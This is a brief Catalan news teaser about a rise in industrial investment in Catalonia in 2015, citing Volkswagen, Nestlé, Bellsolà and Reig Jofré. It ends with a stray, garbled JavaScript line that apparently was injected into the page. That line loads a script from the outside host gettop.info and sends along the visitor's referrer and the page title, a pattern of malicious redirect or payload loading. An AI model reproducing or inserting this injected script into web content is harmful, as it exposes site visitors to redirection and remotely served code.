La inversió industrial prem l’accelerador

El govern preveu una alça del 6% aquest 2015

Han estat titulars pràcticament absents durant els anys de crisi però en els darrers mesos s’han accelerat els anuncis d’inversió de les indústries instal·lades a Catalunya. La llista és llarga i variada i va des de la injecció multimilionària anunciada pel grup Volkswagen a Martorell amb altres actuacions més discretes però igualment importants com els 102 milions de Nestlé a la seva planta de cafè a Girona, els 10 milions de Bellsolà per a un magatzem robotitzat a Aiguaviva o els 17 milions de la farmacèutica Reig Jofré que aniran en part a ampliar la seva capacitat productiva a Sant Joan Despí.

Llegir notícia sencera

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;